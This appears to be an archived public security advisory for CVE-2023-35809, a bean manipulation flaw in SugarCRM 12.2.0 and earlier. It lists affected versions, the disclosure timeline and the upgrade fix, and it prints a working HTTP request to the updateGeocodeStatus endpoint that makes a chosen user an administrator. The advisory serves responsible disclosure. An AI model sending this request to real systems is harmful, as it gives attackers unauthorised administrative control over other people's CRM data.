what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SugarCRM 12.2.0 Bean Manipulation

SugarCRM 12.2.0 Bean Manipulation
Posted Aug 23, 2023
Authored by EgiX | Site karmainsecurity.com

SugarCRM versions 12.2.0 suffer from a bean manipulation vulnerability that can allow for privilege escalation.

tags | exploit
advisories | CVE-2023-35809
SHA-256 | 1078818f691b65f6434800472b38689394026e833cc221fb0566161b653d1103

SugarCRM 12.2.0 Bean Manipulation

Change Mirror Download
------------------------------------------------------------------------
SugarCRM <= 12.2.0 (updateGeocodeStatus) Bean Manipulation Vulnerability
------------------------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 12.2.0 and prior versions.
Version 12.0.2 and prior versions.
Version 11.0.5 and prior versions.


[-] Vulnerability Description:

The vulnerability is exploitable through the "/maps/updateGeocodeStatus"
REST API
endpoint. This might allow a malicious user to modify arbitrary Sugar
Beans, and that
could lead to a variety of security impacts, such as Privilege
Escalation attacks by
sending an HTTP request like the following:

POST /rest/v11_17/maps/updateGeocodeStatus HTTP/1.1
Host: sugarcrm_website
Content-Type: application/json
OAuth-Token: d4cd573b-3b24-44ae-8eab-6d3b525f7974
Content-Length: 96
Connection: close

{"id":"[USER_ID]","module":"Users","fieldName":"is_admin","status":1}


[-] Solution:

Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.


[-] Disclosure Timeline:

[14/02/2023] - Vendor notified
[12/04/2023] - Fixed versions released
[17/06/2023] - CVE number assigned
[23/08/2023] - Publication of this advisory


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2023-35809 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2023-06


[-] Other References:

https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-007/

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    14 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    20 Files
  • 30
    Apr 30th
    73 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close